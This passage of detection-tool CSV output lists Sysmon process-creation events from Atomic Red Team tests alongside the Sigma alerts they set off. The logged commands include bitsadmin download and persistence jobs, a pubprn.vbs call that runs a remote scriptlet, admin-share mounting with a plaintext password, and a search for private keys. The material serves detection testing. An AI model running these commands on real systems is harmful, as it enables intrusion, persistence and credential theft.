C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : 
Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 
/u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: 
C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query 
